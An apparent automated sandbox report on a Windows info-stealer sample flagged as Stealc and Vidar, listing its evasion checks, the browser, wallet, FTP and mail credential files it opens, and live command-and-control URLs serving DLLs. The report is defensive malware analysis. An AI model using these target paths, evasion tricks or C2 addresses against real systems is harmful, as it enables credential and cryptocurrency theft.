Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00934910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00934910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0092DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0092E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0092F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00933EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00933EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009216D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0092BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009338B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0092ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00934570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00934570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0092DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00921160 GetSystemInfo,ExitProcess,

0_2_00921160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: DHCFIDAK.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: DHCFIDAK.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: DHCFIDAK.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: DHCFIDAK.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2260179261.0000000000724000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP`v%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwaret
Source: DHCFIDAK.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: DHCFIDAK.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: DHCFIDAK.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: DHCFIDAK.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: DHCFIDAK.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: DHCFIDAK.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: DHCFIDAK.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: DHCFIDAK.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: DHCFIDAK.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: DHCFIDAK.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: DHCFIDAK.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: DHCFIDAK.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: DHCFIDAK.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: DHCFIDAK.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: DHCFIDAK.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: DHCFIDAK.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWE
Source: file.exe, 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: DHCFIDAK.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: DHCFIDAK.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: DHCFIDAK.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: DHCFIDAK.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-52847
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-52850
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-54036
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-52868
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-52861
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-52901

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009245C0 VirtualProtect ?,00000004,00000100,00000000

0_2_009245C0

Source: C:\Users\user\Desktop\file.exe

0_2_00939860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00939750 mov eax, dword ptr fs:[00000030h]

0_2_00939750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009378E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_009378E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 3856, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00939600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00939600

Source: file.exe, file.exe, 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: 0Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00937B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00937980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00937980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00937850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00937850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00937A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00937A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.920000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2079463767.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3856, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop (old)
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pC:\Users\user\AppData\Roaming\Binance\app-store.json
Source: file.exe	String found in binary or memory: Ethereum
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: MultiDoge
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3856, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.920000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2079463767.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3856, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	47%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php9e	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php0u	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phppiT	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dllL	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dllr	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/softokn3.dllP	100%	Avira URL Cloud	malware
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37:	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dllZ	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll(	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpm	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpx	100%	Avira URL Cloud	malware
